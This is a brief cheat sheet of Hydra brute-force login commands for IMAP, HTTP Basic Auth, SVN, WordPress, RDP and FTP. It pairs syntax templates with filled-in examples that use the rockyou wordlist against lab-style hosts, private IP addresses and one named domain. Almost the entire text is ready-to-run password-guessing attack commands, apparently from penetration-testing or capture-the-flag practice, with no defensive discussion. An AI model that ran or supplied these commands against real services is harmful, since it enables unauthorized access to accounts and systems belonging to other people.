Some examples of Brute Force Attacks using the tool Hydra
IMAP
Sintaxis:
hydra -l [email protected] -P /tmp/list-of-passwords.txt -f target.com imap -V
Basic Auth
Sintaxis:
hydra -l <username> -P <passwords_list.txt> -s <port> -f <SERVER> http-get <PATH> -V```
Example:
hydra -l nathens -P /home/username/wordlists/1000-most-common-passwords.txt -f devops.workers.htb -s 80 http-get / -V
SVN
hydra -l [email protected] -P /usr/share/wordlists/rockyou.txt -f 10.10.10.203 svn -V
Wordpress
hydra -l <username> -P <wordlists> <target> -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' -v
Example:
hydra -l daronwolff -P /usr/share/wordlists/rockyou.txt daronwolff.io -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' -v
Remote Desktop Protocol, RDP port 3389
hydra -t 1 -V -f -l <username> -P <dictionary> rdp://<targetIP>
hydra -t 1 -V -f -l Administrator -P /usr/share/wordlists/rockyou.txt rdp://192.168.12.124
FTP port 21
hydra -t 1 -V -f -l <username> -P <dictionary> ftp://IP_ADDRESS
hydra -t 1 -V -f -l Administrator -P /usr/share/wordlists/rockyou.txt ftp://192.168.12.124
More examples here: